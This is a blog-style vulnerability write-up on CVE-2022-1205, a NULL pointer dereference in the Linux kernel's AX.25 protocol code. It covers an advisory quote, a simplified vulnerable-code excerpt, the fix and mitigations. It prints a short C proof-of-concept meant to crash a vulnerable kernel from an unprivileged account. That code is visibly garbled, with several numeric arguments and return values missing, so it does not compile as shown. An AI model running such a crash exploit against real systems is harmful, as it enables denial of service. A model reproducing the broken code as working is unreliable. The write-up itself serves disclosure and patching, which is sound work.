In early 2022, a security flaw was discovered in the Linux kernel affecting the AX.25 protocol, which is used for amateur radio communications. This vulnerability, tracked as CVE-2022-1205, is a NULL pointer dereference that enables a local attacker to crash the system (triggering a kernel panic). In this article, we'll dig into the details of the vulnerability, review some simple code snippets, follow the logic of the exploit, and provide references for further reading.
What is AX.25?
AX.25 is the primary protocol used by amateur radio operators for digital data transmission, often over packet radio. It is present as an optional networking module in the Linux kernel. Most users don't use it, but it is handy for ham radio setups.
Where is the Flaw?
The flaw sits in how the Linux kernel's AX.25 code handles connection requests. Specifically, it doesn't properly check whether certain resources are initialized before using them. This can lead to a NULL pointer dereference, which on Linux typically results in a system crash, i.e., a denial-of-service (DoS).
Security Advisory
Here’s an official description from Red Hat Bugzilla 2060964:
> "A NULL pointer dereference flaw was found in the Linux kernel’s Amateur Radio AX.25 protocol functionality in the way a user connects with the protocol. This flaw allows a local user to crash the system."
Let's look at the vulnerable code (from net/ax25/af_ax25.c)
static int ax25_connect(struct socket *sock, struct sockaddr *uaddr, int addr_len, int flags)
{
// ... initialization and validation omitted
ax25_cb *ax25;
// ...
ax25 = ax25_find_cb(...); // may return NULL
// ... some code removed for clarity
// UNSAFE: ax25 could be NULL here
ax25->sk = sk;
// dereferencing NULL leads to crash
}
The ax25_find_cb() function can return NULL if it can't find a control block matching the conditions. The code doesn't check if ax25 is NULL before it tries to use it, so dereferencing it (like ax25->sk = sk;) causes a kernel panic.
How Can the Vulnerability Be Triggered?
An unprivileged local user can create an AX.25 socket and attempt to connect with invalid parameters such that the underlying code fails to find the relevant connection block (returns NULL). The kernel then dereferences the NULL pointer, resulting in a crash.
Example: Minimal Exploit Code
Below is a simple C program that will try to crash the Linux kernel when run by an unprivileged user (may require the AX.25 module loaded):
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/ax25.h>
#include <netinet/in.h>
int main() {
int sockfd = socket(AF_AX25, SOCK_SEQPACKET, );
if(sockfd < ) {
perror("socket");
return 1;
}
struct sockaddr_ax25 addr;
memset(&addr, , sizeof(addr));
addr.sax25_family = AF_AX25;
// Intentionally set an invalid call sign
strcpy((char *)&addr.sax25_call, "NOCALL-");
// This connect will trigger the NULL dereference
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
close(sockfd);
return ;
}
*Disclaimer: Running this on a vulnerable system will crash it! Use only on test systems.*
The Linux kernel fixed this bug by adding an appropriate NULL check
if (!ax25)
return -ENOTCONN;
See the kernel commit:
net: ax25: fix NPD bug in ax25_connect()
Disable the AX.25 module if you don’t need amateur radio on your system.
- Regularly monitor the Linux kernel mailing list and Linux security advisories.
References
- Red Hat Bugzilla: CVE-2022-1205
- Kernel.org Patch Commit
- NIST NVD Record
- AX.25 Wikipedia
Conclusion
While CVE-2022-1205 doesn't give an attacker root privileges or allow them to run arbitrary code, being able to force a server to crash can be devastating in many environments. Always keep your systems updated, and disable unnecessary network protocols like AX.25 if they're not in use. If you're a Linux system administrator, pay close attention to kernel advisories, especially if your system loads rarely-used modules.
Timeline
Published on: 08/31/2022 16:15:00 UTC
Last modified on: 09/06/2022 19:33:00 UTC